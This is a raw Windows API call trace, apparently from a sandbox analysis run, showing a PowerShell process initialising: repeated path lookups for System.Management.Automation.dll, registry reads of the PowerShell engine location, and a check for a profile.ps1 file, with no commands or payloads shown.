	[0543.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.581] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0543.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.581] CoTaskMemFree (pv=0x30a930) 
	[0543.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.461] VirtualQuery (in: lpAddress=0xeb530, lpBuffer=0xec3f0, dwLength=0x30 | out: lpBuffer=0xec3f0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0544.466] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0544.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.466] CoTaskMemFree (pv=0x30a930) 
	[0544.474] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0544.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.475] CoTaskMemFree (pv=0x30a930) 
	[0545.480] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0545.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.481] CoTaskMemFree (pv=0x30a930) 
	[0545.481] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0545.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.481] CoTaskMemFree (pv=0x30a930) 
	[0545.487] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0545.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.487] CoTaskMemFree (pv=0x30a930) 
	[0545.493] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0545.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.493] CoTaskMemFree (pv=0x30a930) 
	[0545.495] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0545.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.495] CoTaskMemFree (pv=0x30a930) 
	[0545.500] VirtualQuery (in: lpAddress=0xeb530, lpBuffer=0xec3f0, dwLength=0x30 | out: lpBuffer=0xec3f0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0547.407] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0547.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.408] CoTaskMemFree (pv=0x30a930) 
	[0549.477] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x30ad70
	[0549.480] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x30ae80
	[0560.792] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0560.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.792] CoTaskMemFree (pv=0x30af90) 
	[0560.801] CoTaskMemAlloc (cb=0x104) returned 0x30af90
	[0560.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30af90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.801] CoTaskMemFree (pv=0x30af90) 
	[0563.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.860] VirtualQuery (in: lpAddress=0xeb7e0, lpBuffer=0xec6a0, dwLength=0x30 | out: lpBuffer=0xec6a0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0563.866] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed638 | out: phkResult=0xed638*=0x188) returned 0x0
	[0563.866] RegQueryValueExW (in: hKey=0x188, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed5bc, lpData=0x0, lpcbData=0xed5b8*=0x0 | out: lpType=0xed5bc*=0x1, lpData=0x0, lpcbData=0xed5b8*=0x56) returned 0x0
	[0563.866] CoTaskMemAlloc (cb=0x5a) returned 0x1b8643c0
	[0563.867] RegQueryValueExW (in: hKey=0x188, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed58c, lpData=0x1b8643c0, lpcbData=0xed588*=0x56 | out: lpType=0xed58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed588*=0x56) returned 0x0
	[0563.867] CoTaskMemFree (pv=0x1b8643c0) 
	[0563.867] RegCloseKey (hKey=0x188) returned 0x0
	[0563.867] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed638 | out: phkResult=0xed638*=0x188) returned 0x0
	[0563.867] RegQueryValueExW (in: hKey=0x188, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed5bc, lpData=0x0, lpcbData=0xed5b8*=0x0 | out: lpType=0xed5bc*=0x1, lpData=0x0, lpcbData=0xed5b8*=0x56) returned 0x0
	[0563.867] CoTaskMemAlloc (cb=0x5a) returned 0x1b8643c0
	[0563.867] RegQueryValueExW (in: hKey=0x188, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed58c, lpData=0x1b8643c0, lpcbData=0xed588*=0x56 | out: lpType=0xed58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed588*=0x56) returned 0x0
	[0563.867] CoTaskMemFree (pv=0x1b8643c0) 
	[0563.867] RegCloseKey (hKey=0x188) returned 0x0
	[0563.868] CoTaskMemAlloc (cb=0x20c) returned 0x1b835460
	[0563.868] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b835460 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0563.868] CoTaskMemFree (pv=0x1b835460) 
	[0563.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0563.868] CoTaskMemAlloc (cb=0x20c) returned 0x1b835460
	[0563.868] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b835460 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0563.868] CoTaskMemFree (pv=0x1b835460) 
	[0563.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0563.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0563.869] SetErrorMode (uMode=0x1) returned 0x1
	[0563.869] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed5a0 | out: lpFileInformation=0xed5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.869] SetErrorMode (uMode=0x1) returned 0x1
